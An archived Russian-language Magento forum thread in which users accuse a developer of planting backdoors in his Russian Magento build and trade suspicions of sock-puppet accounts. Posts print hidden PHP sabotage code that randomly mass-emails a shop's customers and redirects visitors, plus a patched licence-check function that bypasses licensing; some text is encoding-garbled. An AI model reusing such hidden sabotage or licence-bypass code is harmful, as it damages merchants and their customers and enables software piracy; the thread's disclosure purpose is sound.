Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Дмитрий Федюк (dfediuk | Dmitry Fediuk) - модуль “Робокасса” российской сборки
 
dimaosna
Sr. Member
 
Avatar
Total Posts:  251
Joined:  2011-10-26
 

помогите найти данную уязвимость - которой пользуется этот чел

и вот его слова “Каждый 20-й клиент этих магазинов-воров в качестве бонуса пере направляется на гей-сайт “

.
Я обращаюсь к жертве klyopsany или жертвам.
Что вы глотаете наживку, брошенную засланными казачками или самим федюком.
Так он вычисляет своих потенциальных врагов, это же талантливый Идиот.
Глупость, и неплохое знание MAGENTO, в нем неплохо прижилось.
.
Вы что не видели все кодировано, а ключи у него.....
Вы что ставите себе эту грязь на хостинг или сервер...?
Если присутствует, хотя бы один файл PHP кодируемый в ionCube PHP Encoder , а ключей у вас нет.
В этом файле PHP зашифрованном, злоумышленник может прописать вагон и тележку грязи и включить таймер.
.
Некоторые виды потенциальных атак злоумышленника на какое-нибудь веб — приложение, например на сайт с видеоклипами.
Первым видом атак будет меж-сайтовый скриптинг.
Данная атака направлена в первую очередь на конечных пользователей web-приложения.
То есть непосредственную угрозу она несет не для самого web-приложения, а для его клиентов.

.
Самой известной атакой рассматриваемого типа является искусственный вызов переполнения буфера.
Этой ошибкой могут попытаться воспользоваться злоумышленники и в отношении web-приложения.
Причем опасности подвергаются системы, написанные на различных языках программирования: Perl, PHP, ASP и т. д.
.
Единственная вещь, что можно взять локализацию русского russian-magento-2.13.13/app/locale/ru_DF
и применить к другим модулям.
Естественно переименовать или скопировать перевод и вставить в нужный Файл “CSV” (.csv)
.
Отключите ionCube на сервере или Хостинг тогда его сборка работать не будет.
Выкидывайте эти файлы чистите Базу или Backup до установки, его сборки.
.
Anti-Fediuk Лож и Провокация
Как известно, дорога в ад вымощена благими намерениями.

Image Attachments
Anti-Fediuk Лож и Провокация.jpgскопировать перевод и вставить в нужный Файл “CSV” (.csv).jpg
 
Magento Community Magento Community
Magento Community
Magento Community
 
vzlomschik
Jr. Member
 
Total Posts:  1
Joined:  2012-12-18
 

Поставил себе 2.13.11 из архива выше.
При установке были небольшие проблемы (ругалась на пустой невалидный XML-файл app/code/local/Df/Client/etc/config.xml), но потом все заработало.
Однако через два часа сборка разослала всем покупателям магазина письмо: ”Наш магазин подворовывает”.
Также один раз при заходе в личный кабинет покупателя сборка перенаправила меня на следующую страницу (со взломанной версией 2.13.5 раньше такие же проблемы были).
Стал анализировать код, нашел ещё один бэкдор.
Выпускаю свой релиз, за основу взята последняя версия российской сборки 2.13.13.
Рекомендую всем обновиться, дабы избежать неприятностей с рассылкой вашим клиентам сообщения о воровстве grin

 
Magento Community Magento Community
Magento Community
Magento Community
 
dimaosna
Sr. Member
 
Avatar
Total Posts:  251
Joined:  2011-10-26
 

vzlomschik
Выпускаю свой релиз, за основу взята последняя версия российской сборки 2.13.13.
Рекомендую всем обновиться, дабы избежать неприятностей с рассылкой вашим клиентам сообщения о воровстве

.
Ну на доже переродился, прям как птица Феникс.
.
Не клюйте на удочку димы
Не ставьте себе эту грязь на хостинг или сервер..!

Image Attachments
Anti-Fediuk Лож и Провокация.jpg
 
Magento Community Magento Community
Magento Community
Magento Community
 
noonesshadow
Jr. Member
 
Total Posts:  6
Joined:  2012-03-19
 

dimaosna
Похоже, Дмитрий воспользовался Вашим советом, и опубликовал свою версию. Для внесения смуты smile
Первую (2.13.11) протестировал, там вроде бы все чисто - в Вашем сравнении разные версии (2.13.11 против 2.13.13).

 
Magento Community Magento Community
Magento Community
Magento Community
 
noonesshadow
Jr. Member
 
Total Posts:  6
Joined:  2012-03-19
 

Действительно, в версии vzlomschik (Дмитрий Федюк, псевдоним)
изменена логика проверки. Как подтверждение:

function piratesPunish()
        
{
        $rand 
rand(120);
        if (
=== $rand)
            
{
            $this
->notifyCustomersAboutPirate();
            
}
        
if (=== $rand)
            
{
            $this
->redirectToGayWebsite();
            
}
        
return $this;
        
}
    
function notifyCustomersAboutPirate()
        
{
        $customers 
Mage::getresourcemodel(\'customer/customer_collection\');
        
df_assert($customers instanceof Mage_Customer_Model_Resource_Customer_Collection);
        
$mail = new Zend_Mail(\'utf-8\');
        
$mail->setFrom(df()->mail()->getCurrentStoreMailAddress())->setSubject(\'Наш Ð¼Ð°Ð³Ð°Ð·Ð¸Ð½ Ð¿Ð¾Ð´Ð²Ð¾Ñ€Ð¾Ð²Ñ‹Ð²Ð°ÐµÑ‚\');
        foreach (
$customers as $customer)
            
{
            df_assert
($customer instanceof Mage_Customer_Model_Customer);
            
$mail->addTo($customer->getData(\'email\'));
            
}
        $mail
->addTo(\'support@dfediuk.com\');
        
$mail->setBodyText(\'Наш Ð¼Ð°Ð³Ð°Ð·Ð¸Ð½ Ð¿Ð¾Ð´Ð²Ð¾Ñ€Ð¾Ð²Ñ‹Ð²Ð°ÐµÑ‚ Ñƒ Ð²Ð°Ñ Ð¸ Ð¸ÑÐ¿Ð¾Ð»ÑŒÐ·ÑƒÐµÑ‚ Ð¿Ð¸Ñ€Ð°Ñ‚ское Ð¿Ñ€Ð¾Ð³Ñ€Ð°Ð¼Ð¼Ð½Ð¾Ðµ Ð¾Ð±ÐµÑÐ¿ÐµÑ‡ÐµÐ½Ð¸Ðµ.\');
        
$mail->send();
        return 
$this;
        
}
    
function redirectToGayWebsite()
        
{
        
if (!headers_sent())
            
{
            sprintf
(\'%s Ð¿ÐµÑ€ÐµÐ½Ð°Ð¿Ñ€Ð°Ð²Ð»ÐµÐ½ Ðº Ð³ÐµÑÐ¼\'df()->request()->getController()->getRequest()->getHttpHost());
            
$text df()->request()->getController()->getResponse()->setRedirect(\'http://love.gay.ru/search.phtml?t=a&sz;=s&ia;=M&lf;=M⁡=&at;=&s;_c=3159_0_0_0&s;_tg=\');
            
mail(\'support@dfediuk.com\'$text$text);
            
}
        
return $this;
        
}
    }
 
Magento Community Magento Community
Magento Community
Magento Community
 
topmoda
Jr. Member
 
Total Posts:  2
Joined:  2012-12-18
 

Подтверждаю, что ломаная 2.13.11 спамит письмами клиентам (при оформлении заказа). 2.13.13 не пробовал. У кого работает?

 
Magento Community Magento Community
Magento Community
Magento Community
 
andrich
Jr. Member
 
Total Posts:  15
Joined:  2012-10-02
 

2.13.11 ничего не отсылает)) качаем.

 
Magento Community Magento Community
Magento Community
Magento Community
 
niro
Mentor
 
Avatar
Total Posts:  1609
Joined:  2009-03-04
Latvia, Riga
 

Смешно. Пишут люди с 1-3 сообщениями на форуме. Стоит задуматься о доверии.

P.S. Но использовать эту поделку не стоит, как и постить сюда сломанные копии. Ведь могут удалить тему и этим подведёте тех, кто не узнает о некорректном обращении с клиентами.

 
Magento Community Magento Community
Magento Community
Magento Community
 
andrich
Jr. Member
 
Total Posts:  15
Joined:  2012-10-02
 
niro - 18 December 2012 10:00 AM

Смешно. Пишут люди с 1-3 сообщениями на форуме. Стоит задуматься о доверии.

P.S. Но использовать эту поделку не стоит, как и постить сюда сломанные копии. Ведь могут удалить тему и этим подведёте тех, кто не узнает о некорректном обращении с клиентами.

Ну меня то можно проверить, просто набрав логин на известном форуме и все станет ясно) Под мои логином “товарищ” Федюк написал, что я вор, Ñ‚.е. он провел расследование и огласил приговор!

 
Magento Community Magento Community
Magento Community
Magento Community
 
noonesshadow
Jr. Member
 
Total Posts:  6
Joined:  2012-03-19
 
niro - 18 December 2012 10:00 AM

Смешно. Пишут люди с 1-3 сообщениями на форуме. Стоит задуматься о доверии.

P.S. Но использовать эту поделку не стоит, как и постить сюда сломанные копии. Ведь могут удалить тему и этим подведёте тех, кто не узнает о некорректном обращении с клиентами.

Не сложно догадаться, что этих людей (меня в частности) в эту тему привела вовсе не тематика этого форума - а проблемы/зуб на Дмитрия Федюка

 
Magento Community Magento Community
Magento Community
Magento Community
 
dimaosna
Sr. Member
 
Avatar
Total Posts:  251
Joined:  2011-10-26
 

Не клюйте на удочку димы и засланных казачков...
.
Не ставьте себе эту грязь на хостинг или сервер..!
.
Anti-Fediuk Лож и Провокация

Image Attachments
Anti-Fediuk Лож и Провокация.jpg
 
Magento Community Magento Community
Magento Community
Magento Community
 
topmoda
Jr. Member
 
Total Posts:  2
Joined:  2012-12-18
 
andrich - 18 December 2012 10:06 AM

niro - 18 December 2012 10:00 AM
Смешно. Пишут люди с 1-3 сообщениями на форуме. Стоит задуматься о доверии.

P.S. Но использовать эту поделку не стоит, как и постить сюда сломанные копии. Ведь могут удалить тему и этим подведёте тех, кто не узнает о некорректном обращении с клиентами.

Ну меня то можно проверить, просто набрав логин на известном форуме и все станет ясно) Под мои логином “товарищ” Федюк написал, что я вор, Ñ‚.е. он провел расследование и огласил приговор!

Да уж, сурово он с вами.
Но у меня почему-то 2.13.11 пыталась отослать письма клиентам.
Может, дело в каком-то модуле доставки или оплаты. Буду разбирться.

 
Magento Community Magento Community
Magento Community
Magento Community
 
riginavi
Jr. Member
 
Total Posts:  12
Joined:  2012-09-11
 

dimaosna Выдыхай. В 11 действительно был косяк идиота Федюка. Не всегда бывает возможно всё усмотреть.
Аля “взломщик”, это Федюк или его дружки задроты.  Вот это реальная провокация. Ну поставьте локально, и увидите сами. Никто же не говорит вам что надо ставить.

Будут вопросы, задавайте.

 
Magento Community Magento Community
Magento Community
Magento Community
 
dimaosna
Sr. Member
 
Avatar
Total Posts:  251
Joined:  2011-10-26
 

Ну на доже сколько у тебя здесь аккаунтов Дима, Ñ‚Ñ‹ не устал регистрироваться. 
riginavi
topmoda
andrich
vzlomschik

dimaosna Выдыхай. В 11 действительно был косяк идиота Федюка. Не всегда бывает возможно всё усмотреть.

Мне нечего выдыхать я просто открыл глаза людям.
.
1) После первого поста написанный тобой я просто посмеялся.
Благодарные клиенты представляют “Антироссийскую сборку”!
.
2) После второго поста твоего я задумался, почему люди верят этому Идиоту.
Удален бекдор
.
3) Ну а третий пост это уже наглое впихивание грязи на форум…
Тестируем.
.
4) Четвертый пост. Это визг поросенка .
Поставил себе 2.13.11 из архива выше.
.
Я не ставил локально грязь, и не поставлю, и тем более на Удаленные, Хостинг или Сервер.
.
Другим я тоже советую не устанавливать грязь на Хостинг или Сервер.
Единственное можно взять от сборки локализацию, и то больше половина спер у Niro
.
И почему везде написано, что сломанная сборка.
Не один файл не изменен, и кодированы главные файлы PHP.

Дурочку не включай, и не распространяй Спам
Если будете продолжать я сообщу, Администрации сайта что ты раздаешь Спам .
Anti-Fediuk Лож и Провокация

Image Attachments
Anti-Fediuk Лож и Провокация.jpg
 
Magento Community Magento Community
Magento Community
Magento Community
 
klyopsany
Jr. Member
 
Total Posts:  12
Joined:  2012-12-10
 

<?php
function df_enabled($feature, $store = NULL)
{
// throw new Exception("fckdf");
if ($feature == "super") return false;
return true;
static $licensorHelper = null;
if (!isset($licensorHelper))
{
$licensorHelper = df_helper()->licensor();
}
return $licensorHelper->getCachedSingleton()->isEnabled($feature, $store);
}
function df_feature($code)
{
df_param_string($code, 0);
return df_helpe
r()->licensor()->getFeatureByCode($code);
}
function df_is_it_my_local_pc()
{
return 'DFEDIUK-PC' == df_a($_SERVER, 'COMPUTERNAME');
}
function df_is_it_my_sever()
{
$httpHost = ('server.magento-pro.ru' === Mage::app()->getRequest()->getHttpHost() && '176.9.3.77' === df_a($_SERVER, 'SERVER_ADDR'));
df_result_boolean($httpHost);
return true;
}
?>

нашол еще такое

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top